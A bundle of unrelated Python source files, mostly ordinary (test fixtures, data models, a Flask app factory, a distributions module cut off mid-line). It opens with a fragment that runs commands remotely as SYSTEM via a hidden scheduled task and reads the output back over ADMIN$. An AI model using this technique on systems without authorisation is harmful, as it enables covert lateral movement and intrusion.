xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/C %s > %%windir%%\\Temp\\%s 2>&1</Arguments>
</Exec>
</Actions>
</Task>
""" % (self.__command, tmpFileName)
taskCreated = False
try:
logger.info('Creating task \\%s' % tmpName)
tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
taskCreated = True
logger.info('Running task \\%s' % tmpName)
tsch.hSchRpcRun(dce, '\\%s' % tmpName)
done = False
while not done:
logger.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
time.sleep(2)
logger.info('Deleting task \\%s' % tmpName)
tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
taskCreated = False
except tsch.DCERPCSessionError as e:
logger.error(e)
e.get_packet().dump()
finally:
if taskCreated is True:
tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
smbConnection = rpctransport.get_smb_connection()
waitOnce = True
while True:
try:
logger.info('Attempting to read ADMIN$\\Temp\\%s' % tmpFileName)
smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, output_callback)
break
except Exception as e:
if str(e).find('SHARING') > 0:
time.sleep(3)
elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
if waitOnce is True:
# We're giving it the chance to flush the file before giving up
time.sleep(3)
waitOnce = False
else:
raise
else:
raise
logger.debug('Deleting file ADMIN$\\Temp\\%s' % tmpFileName)
smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
dce.disconnect()
|
'''
Created on May 13, 2019
@author: KJNETHER
trying to set up the fixtures so that they:
- test for 'test' data
- remove 'test' data if it already exists
- re-create test data
'''
import json
import logging
import os.path
import pytest
# pylint: disable=redefined-outer-name
from .config_fixture import test_package_name
from .config_fixture import test_user
from bcdc_apitests.helpers.file_utils import FileUtils
LOGGER = logging.getLogger(__name__)
# @pytest.fixture
# def populate_bcdc_dataset(org_create_if_not_exists_fixture, get_cached_package_path,
# test_package_name, test_user):
# '''
# :param org_create_if_not_exists_fixture: creates the test org if it doesn't
# already exist.
# :param test_data_dir: the data directory fixture, provides the directory
# where data is located
# :param test_package_name: the name of the test package
#
# assumption is that the 'data_label_fixture' is the name of a method in
# .helpers.bcdc_dynamic_data_population.DataPopulation. That method
# is going to get called and the returning data is what will get returned
#
# #TODO: 9-26-2019 in the middle of implementing what is described above.
#
# '''
#
#
#
#
# org_id = org_create_if_not_exists_fixture['id']
# LOGGER.debug("test_package_name: %s", test_package_name)
# LOGGER.debug("test user: %s", test_user)
# json_file = os.path.join(test_data_dir, data_label_fixture[0])
# with open(json_file, 'r') as json_file_hand:
# datastore = json.load(json_file_hand)
# datastore['name'] = test_package_name
# datastore['title'] = '{0} {1}'.format(datastore['title'], test_user)
# datastore['org'] = org_id
# datastore['owner_org'] = org_id
# datastore['sub_org'] = org_id
#
# # for now removing any group references. Should do group testing later
# # created a ticket to keep track of that issue DDM-738.
# if 'groups' in datastore:
# del datastore['groups']
# return datastore
@pytest.fixture
def resource_data(package_create_if_not_exists,
test_resource_name):
'''
:param test_data_dir: The directory where the data files are
expected to be
:param test_resource_name: the name of the resource that should
be used for this test
'''
test_data_dir = FileUtils().get_test_data_dir()
logging.debug("test_resource_name: %s", test_resource_name)
json_file = os.path.join(test_data_dir, 'resource.json')
with open(json_file, 'r') as json_file_hand:
resource = json.load(json_file_hand)
resource['name'] = test_resource_name
resource['package_id'] = package_create_if_not_exists['id']
return resource
@pytest.fixture
def test_pkg_data_core_only(populate_bcdc_dataset):
'''
:param populate_bcdc_dataset: Valid package data
Method will remove all but the core attributes required as described in
the ckan docs.
(https://docs.ckan.org/en/2.8/api/#module-ckan.logic.action.create)
core attributes:
- name (string)
- title (string)
- private (bool)
- owner_org (configurable as optional, assuming its not)
'''
logging.debug("test_package_name: %s", populate_bcdc_dataset)
core_attribs = ['name', 'title', 'private', 'owner_org']
core_atribs_only_pkg = {}
for key in populate_bcdc_dataset.keys():
if key in core_attribs:
core_atribs_only_pkg[key] = populate_bcdc_dataset[key]
return core_atribs_only_pkg
@pytest.fixture
def test_pkg_data_updated(populate_bcdc_dataset):
'''
:param populate_bcdc_dataset: package data structure that can be used to load a new
package
:return: a ckan package data structure that can be loaded to ckan for testing
'''
logging.debug("test_package_name: %s", test_package_name)
populate_bcdc_dataset['title'] = 'test package update'
return populate_bcdc_dataset
@pytest.fixture
def test_pkg_data_prep(populate_bcdc_dataset, test_package_state, test_package_visibility):
'''
:param populate_bcdc_dataset: package data structure that can be used to load a new
package
'''
logging.debug("test_package_name: %s", test_package_name)
populate_bcdc_dataset['edc_state'] = test_package_state
populate_bcdc_dataset['metadata_visibility'] = test_package_visibility
return populate_bcdc_dataset
@pytest.fixture
def test_org_data(test_organization):
'''
:param test_data_dir: directory where test data is expected
:param test_organization: The name to be substituted in for the test organization name
:return: an organization data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'ownerOrg.json')
with open(json_file, 'r') as json_file_hand:
org_data = json.load(json_file_hand)
org_data['name'] = test_organization
return org_data
@pytest.fixture
def test_group_data(test_group):
'''
:param test_data_dir: directory where test data is expected
:param test_group: The name to be substituted in for the test organization name
:return: an group data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'group.json')
with open(json_file, 'r') as json_file_hand:
group_data = json.load(json_file_hand)
group_data['name'] = test_group
return group_data
@pytest.fixture(scope='session')
def session_test_org_data(test_session_organization):
'''
:return: an organization data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'ownerOrg.json')
LOGGER.debug("json file path: %s", json_file)
with open(json_file, 'r') as json_file_hand:
org_data = json.load(json_file_hand)
org_data['name'] = test_session_organization
return org_data
@pytest.fixture(scope='session')
def session_test_group_data(test_session_group):
'''
:return: an group data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'ownerOrg.json')
LOGGER.debug("json file path: %s", json_file)
with open(json_file, 'r') as json_file_hand:
group_data = json.load(json_file_hand)
group_data['name'] = test_session_group
return group_data
|
#!/usr/bin/env python
from Bio import AlignIO
import sys
#This script takes a sequential phylip alignment and converts is to a
#FASTA alignment
# check for correct arguments
if len(sys.argv) != 3:
print("Usage: PhylipSequentialToFasta.py <inputfile> <outputfile>")
sys.exit(0)
input_name = sys.argv[1]
output_name = sys.argv[2]
input_file = open(input_name, 'r')
output_file = open(output_name, 'w')
alignment = AlignIO.read(input_file, 'phylip-sequential')
AlignIO.write(alignment, output_file, 'fasta')
input_file.close()
output_file.close()
|
from django.contrib.auth.models import User
from guardian.shortcuts import assign_perm
from permissions.services import APIPermissionClassFactory
from post.models import Post
from post.serializers import PostSerializer
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from versus.views import get_element_random, pick_post, getComments
from versus.models import Versus
from follow.models import Follow
from like.models import Like
from versus.serializers import VersusSerializer
def evaluate(user, obj, request):
return user.id == obj.user.id
class PostViewSet(viewsets.ModelViewSet):
queryset = Post.objects.all()
serializer_class = PostSerializer
permission_classes = (
APIPermissionClassFactory(
name='EventPermission',
permission_configuration={
'base': {
'create': True,
'list': True,
},
'instance': {
'retrieve': True,
'destroy': evaluate,
'update': evaluate,
'partial_update': evaluate,
}
}
),
)
def perform_create(self, serializer):
post = serializer.save()
post.order = len(Post.objects.filter(topic=post.topic))
post.save()
return Response(serializer.data)
|
from dataclasses import dataclass
from typing import List
from pydantic import BaseModel
class DeckIn(BaseModel):
name: str
class DeckOut(BaseModel):
id: int # From database
name: str # From database
notes_total: int # Calculated
cards_total: int # Calculated
time_created: int # From database
count_reviews_due: int # Calculated
count_new_cards: int # Calculated
class NoteIn(BaseModel):
deck_id: int
text_front: str
text_back: str
class NoteOut(BaseModel):
id: int # From database
deck_id: int # From database
text_front: str # From database
text_back: str # From database
audio_front: str # From database
audio_back: str # From database
image_front: str # From database
image_back: str # From database
time_created: int # From database
# cards_total: int # Calculated
# TODO remove question and answer, these are only to be stored in Note
# e.g. what happens when Note content gets edited? You have to edit all the cards too with this current setup.
@dataclass
class CardIn:
note_id: int
direction: str
# TODO remove all below
deck_id: int
question: str
answer: str
class CardOut(BaseModel):
id: int # From database
deck_id: int # Calculated
note_id: int # From database
direction: str # From database
question: str # From database
answer: str # From database
status: str # From database
time_created: int # From database
time_latest_review: int # Calculated
current_review_interval: int # From database
dispersal_groups: List[int] = [] # From database
grade: str # From database
class ReviewOut(BaseModel):
id: int # From database
card: CardOut # Calculated
time_created: int # From database
time_completed: int # From database
review_status: str # From database
correct: int # From database
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2013-2015 Wind River Systems, Inc.
#
from neutron_lib import context
from neutron_lib import exceptions as exc
from oslo_log import log as logging
from neutron.common import constants as n_const
from neutron.common import exceptions as n_exc
from neutron.db import api as db
from neutron.db.models.plugins.ml2 import flatallocation
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.wrs.drivers import type_managed_flat
from neutron.tests.unit.plugins.wrs import test_extension_pnet as test_pnet
from neutron.tests.unit.plugins.wrs import test_wrs_plugin
LOG = logging.getLogger(__name__)
FLAT_PNET1 = {'name': 'flat-pnet0',
'type': n_const.PROVIDERNET_FLAT,
'description': 'flat test provider network'}
class ManagedFlatTypeDriverTestCase(test_pnet.ProvidernetTestCaseMixin,
test_wrs_plugin.WrsMl2PluginV2TestCase):
def setUp(self):
super(ManagedFlatTypeDriverTestCase, self).setUp()
self.context = context.get_admin_context()
self.driver = type_managed_flat.ManagedFlatTypeDriver()
self.session = db.get_session()
self._pnet1 = FLAT_PNET1
def tearDown(self):
super(ManagedFlatTypeDriverTestCase, self).tearDown()
def _get_allocation(self, context, segment):
session = context.session
return session.query(flatallocation.FlatAllocation).filter_by(
physical_network=segment[api.PHYSICAL_NETWORK]).first()
def test_validate_provider_segment(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
self.driver.validate_provider_segment(segment, self.context)
def test_validate_provider_segment_with_missing_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment, self.context)
def test_validate_provider_segment_with_unknown_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'unknown'}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment, self.context)
def test_validate_provider_segment_with_unallowed_segmentation_id(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: self._pnet1['name'],
api.SEGMENTATION_ID: 1234}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment, self.context)
def test_reserve_provider_segment(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
observed = self.driver.reserve_provider_segment(
self.context, segment, tenant_id=self._tenant_id)
alloc = self._get_allocation(self.context, observed)
self.assertEqual(segment[api.PHYSICAL_NETWORK],
alloc.physical_network)
self.driver.release_segment(self.context, observed)
def test_release_segment(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
observed = self.driver.reserve_provider_segment(
self.context, segment, tenant_id=self._tenant_id)
alloc = self._get_allocation(self.context, segment)
self.assertIsNotNone(alloc)
self.driver.release_segment(self.context, observed)
alloc = self._get_allocation(self.context, segment)
self.assertIsNone(alloc)
def test_reserve_provider_segment_already_reserved(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
observed = self.driver.reserve_provider_segment(
self.context, segment, tenant_id=self._tenant_id)
self.assertRaises(n_exc.FlatNetworkInUse,
self.driver.reserve_provider_segment,
self.context, segment, tenant_id=self._tenant_id)
self.driver.release_segment(self.context, observed)
|
import sys
from _pydevd_bundle.pydevd_constants import IS_PY38_OR_GREATER
import pytest
SOME_LST = ["foo", "bar"]
BAR = "bar"
FOO = "foo"
global_frame = sys._getframe()
def obtain_frame():
yield sys._getframe()
@pytest.fixture
def disable_critical_log():
# We want to hide the logging related to _evaluate_with_timeouts not receiving the py_db.
from _pydev_bundle.pydev_log import log_context
import io
stream = io.StringIO()
with log_context(0, stream):
yield
def test_evaluate_expression_basic(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
evaluate_expression(None, frame, 'some_var = 1', is_exec=True)
assert frame.f_locals['some_var'] == 1
check(next(iter(obtain_frame())))
assert 'some_var' not in sys._getframe().f_globals
# as locals == globals, this will also change the current globals
check(global_frame)
assert 'some_var' in sys._getframe().f_globals
del sys._getframe().f_globals['some_var']
assert 'some_var' not in sys._getframe().f_globals
def test_evaluate_expression_1(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = '''
container = ["abc","efg"]
results = []
for s in container:
result = [s[i] for i in range(3)]
results.append(result)
'''
evaluate_expression(None, frame, eval_txt, is_exec=True)
assert frame.f_locals['results'] == [['a', 'b', 'c'], ['e', 'f', 'g']]
assert frame.f_locals['s'] == "efg"
check(next(iter(obtain_frame())))
for varname in ['container', 'results', 's']:
assert varname not in sys._getframe().f_globals
check(global_frame)
for varname in ['container', 'results', 's']:
assert varname in sys._getframe().f_globals
for varname in ['container', 'results', 's']:
del sys._getframe().f_globals[varname]
def test_evaluate_expression_2(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = 'all((x in (BAR, FOO) for x in SOME_LST))'
assert evaluate_expression(None, frame, eval_txt, is_exec=False)
check(next(iter(obtain_frame())))
check(global_frame)
def test_evaluate_expression_3(disable_critical_log):
if not IS_PY38_OR_GREATER:
return
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = '''11 if (some_var := 22) else 33'''
assert evaluate_expression(None, frame, eval_txt, is_exec=False) == 11
check(next(iter(obtain_frame())))
assert 'some_var' not in sys._getframe().f_globals
# as locals == globals, this will also change the current globals
check(global_frame)
assert 'some_var' in sys._getframe().f_globals
del sys._getframe().f_globals['some_var']
assert 'some_var' not in sys._getframe().f_globals
def test_evaluate_expression_4(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = '''import email;email.foo_value'''
with pytest.raises(AttributeError):
evaluate_expression(None, frame, eval_txt, is_exec=True)
assert 'email' in frame.f_locals
check(next(iter(obtain_frame())))
assert 'email' not in sys._getframe().f_globals
# as locals == globals, this will also change the current globals
check(global_frame)
assert 'email' in sys._getframe().f_globals
del sys._getframe().f_globals['email']
assert 'email' not in sys._getframe().f_globals
|
def readSurface(name):
"""Read the files 'name'.vertices and 'name'.triangles and returns
lists of 6-floats for vertices x,y,z,nx,ny,nz and a list of 3-ints
for triangles"""
import string
f = open(name + ".vertices")
vdata = f.readlines()
f.close()
vdata = map(string.split, vdata)
vdata = map(
lambda x: (
float(x[0]),
float(x[1]),
float(x[2]),
float(x[3]),
float(x[4]),
float(x[5]),
),
vdata,
)
f = open(name + ".triangles")
tdata = f.readlines()
f.close()
tdata = map(string.split, tdata)
tdata = map(lambda x: (int(x[0]), int(x[1]), int(x[2])), tdata)
return vdata, tdata
|
from . import AWSObject, AWSProperty
from .validators import *
from .constants import *
# -------------------------------------------
class KMSKey(AWSObject):
"""# AWS::KMS::Key - CloudFormationResourceSpecification version: 1.4.0
{
"Attributes": {
"Arn": {
"PrimitiveType": "String"
}
},
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html",
"Properties": {
"Description": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-description",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Mutable"
},
"EnableKeyRotation": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enablekeyrotation",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
},
"Enabled": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enabled",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
},
"KeyPolicy": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keypolicy",
"PrimitiveType": "Json",
"Required": true,
"UpdateType": "Mutable"
},
"KeyUsage": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keyusage",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Immutable"
}
}
}
"""
resource_type = "AWS::KMS::Key"
props = {
'Description': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-description'),
'EnableKeyRotation': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enablekeyrotation'),
'Enabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enabled'),
'KeyPolicy': ((basestring, dict), True, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keypolicy'),
'KeyUsage': (basestring, False, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keyusage')
}
# -------------------------------------------
class KMSAlias(AWSObject):
"""# AWS::KMS::Alias - CloudFormationResourceSpecification version: 1.4.0
{
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html",
"Properties": {
"AliasName": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-aliasname",
"PrimitiveType": "String",
"Required": true,
"UpdateType": "Immutable"
},
"TargetKeyId": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-targetkeyid",
"PrimitiveType": "String",
"Required": true,
"UpdateType": "Mutable"
}
}
}
"""
resource_type = "AWS::KMS::Alias"
props = {
'AliasName': (basestring, True, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-aliasname'),
'TargetKeyId': (basestring, True, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-targetkeyid')
}
|
"""arsenal.app - application factory"""
from flask import Flask
from flask_gravatar import Gravatar
from flask_moment import Moment
from flask_pure import Pure
from flask_simplemde import SimpleMDE
from .forum import forum
from .user import user, init_app as user_init_app
from .models import init_app as models_init_app
def create_app(config_filename):
"""application factory"""
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile(config_filename)
models_init_app(app)
user_init_app(app)
Gravatar(app, default='identicon')
Moment(app)
Pure(app)
SimpleMDE(app)
app.register_blueprint(forum, url_prefix='/t')
app.register_blueprint(user, url_prefix='/u')
return app
|
from abc import ABC, abstractmethod
from typing import NamedTuple, Optional
import numpy as np
from scipy import special
from scipy.special import beta, digamma, erf, erfinv, hyp2f1
from scipy.stats import uniform
def check_is_probability(x):
raise NotImplementedError()
class Interval:
pass
class ContinuousInterval(NamedTuple):
lower: float
upper: float
class DiscreteInterval(NamedTuple):
lower: int
upper: int
class Distribution(ABC):
@abstractmethod
def mean(self) -> float:
pass
@abstractmethod
def var(self) -> float:
pass
@abstractmethod
def std(self) -> float:
pass
@abstractmethod
def median(self) -> float:
pass
@abstractmethod
def entropy(self) -> float:
pass
@abstractmethod
def support(self) -> Interval:
pass
@abstractmethod
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
@abstractmethod
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
@abstractmethod
def sf(self, x: np.ndarray) -> np.ndarray:
pass
@abstractmethod
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@abstractmethod
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class ContinuousDistribution(Distribution):
@abstractmethod
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
class DiscreteDistribution(Distribution):
@abstractmethod
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
class Uniform(ContinuousDistribution):
def __init__(self, lower, upper) -> None:
self.lower = lower
self.upper = upper
def mean(self) -> float:
return (self.lower + self.upper) / 2
def var(self) -> float:
return pow(self.upper - self.lower, 2) / 12
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.mean()
def entropy(self) -> float:
return np.log(self.upper - self.lower)
def support(self) -> ContinuousInterval:
return ContinuousInterval(self.lower, self.upper)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
dist = uniform(self.lower, (self.upper - self.lower))
return dist.rvs(size, random_state=random_state)
def pdf(self, x: np.ndarray) -> np.ndarray:
constant = 1 / (self.upper - self.lower)
density = np.where((x < self.lower) | (x > self.upper), 0.0, constant)
return density
def cdf(self, x: np.ndarray) -> np.ndarray:
value = (x - self.lower) / (self.upper - self.lower)
return np.clip(value, 0.0, 1.0)
def sf(self, x: np.ndarray) -> np.ndarray:
return 1 - self.cdf(x)
def ppf(self, x: np.ndarray) -> np.ndarray:
check_is_probability(x)
return self.lower + x * (self.upper - self.lower)
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Uniform':
return Uniform(lower=dataset.min(), upper=dataset.max())
class Normal(ContinuousDistribution):
def __init__(self, mean, std) -> None:
self.mean_ = mean
self.std_ = std
def mean(self) -> float:
return self.mean_
def var(self) -> float:
return self.std_ ** 2
def std(self) -> float:
return self.std_
def median(self) -> float:
return self.mean_
def entropy(self) -> float:
return 0.5 * np.log(2 * np.pi * np.e * pow(self.std_, 2))
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
p = uniform(0, 1).rvs(size, random_state=random_state)
return self.ppf(p)
def pdf(self, x: np.ndarray) -> np.ndarray:
const = 1 / (self.std_ * pow(2 * np.pi, 0.5))
func = np.exp(-0.5 * np.square((x - self.mean_) / self.std_))
return const * func
def cdf(self, x: np.ndarray) -> np.ndarray:
return 0.5 * (1 + erf((x - self.mean_) / (self.std_ * pow(2, 0.5))))
def sf(self, x: np.ndarray) -> np.ndarray:
return 1 - self.cdf(x)
def ppf(self, x: np.ndarray) -> np.ndarray:
check_is_probability(x)
A = self.std_ * pow(2, 0.5) * erfinv(2 * x - 1)
return self.mean_ + A
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Normal':
mu = dataset.mean()
sigma = dataset.std(ddof=1)
return Normal(mean=mu, std=sigma)
class StudentT(ContinuousDistribution):
def __init__(self, df, loc, scale) -> None:
self.df = df
self.loc = loc
self.scale = scale
def mean(self) -> float:
if self.df > 1:
return self.loc
return np.nan
def var(self) -> float:
if self.df > 2:
return pow(self.scale, 2) * self.df / (self.df - 2)
elif self.df > 1:
return np.inf
return np.nan
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.loc
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
p = uniform(0, 1).rvs(size, random_state=random_state)
return self.ppf(p)
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
return 1 - self.cdf(x)
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'StudentT':
pass
class Laplace(ContinuousDistribution):
def __init__(self, mu, b) -> None:
self.mu = mu
self.b = b
def mean(self) -> float:
return self.mu
def var(self) -> float:
return 2 * pow(self.b, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.mu
def entropy(self) -> float:
return np.log(2 * self.b * np.e)
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Logistic(ContinuousDistribution):
def __init__(self, loc, scale) -> None:
self.loc = loc
self.scale = scale
def mean(self) -> float:
return self.loc
def var(self) -> float:
return pow(self.scale, 2) * pow(np.pi, 2) / 3
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.loc
def entropy(self) -> float:
return np.log(self.scale) + 2
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Cauchy(ContinuousDistribution):
def __init__(self, loc, scale) -> None:
self.loc = loc
self.scale = scale
def mean(self) -> float:
return np.nan
def var(self) -> float:
return np.nan
def std(self) -> float:
return np.nan
def median(self) -> float:
return self.loc
def entropy(self) -> float:
return np.log(4 * np.pi * self.scale)
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Exponential(ContinuousDistribution):
def __init__(self, rate) -> None:
self.rate = rate
def mean(self) -> float:
return 1 / self.rate
def var(self) -> float:
return 1 / pow(self.rate, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return np.log(2) / self.rate
def entropy(self) -> float:
return 1 - np.log(self.rate)
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Pareto(ContinuousDistribution):
def __init__(self, xmin, shape) -> None:
self.xmin = xmin
self.shape = shape
def mean(self) -> float:
if self.shape <= 1:
return np.inf
return self.shape * self.xmin / (self.shape - 1)
def var(self) -> float:
if self.shape <= 2:
return np.inf
num = pow(self.xmin, 2) * self.shape
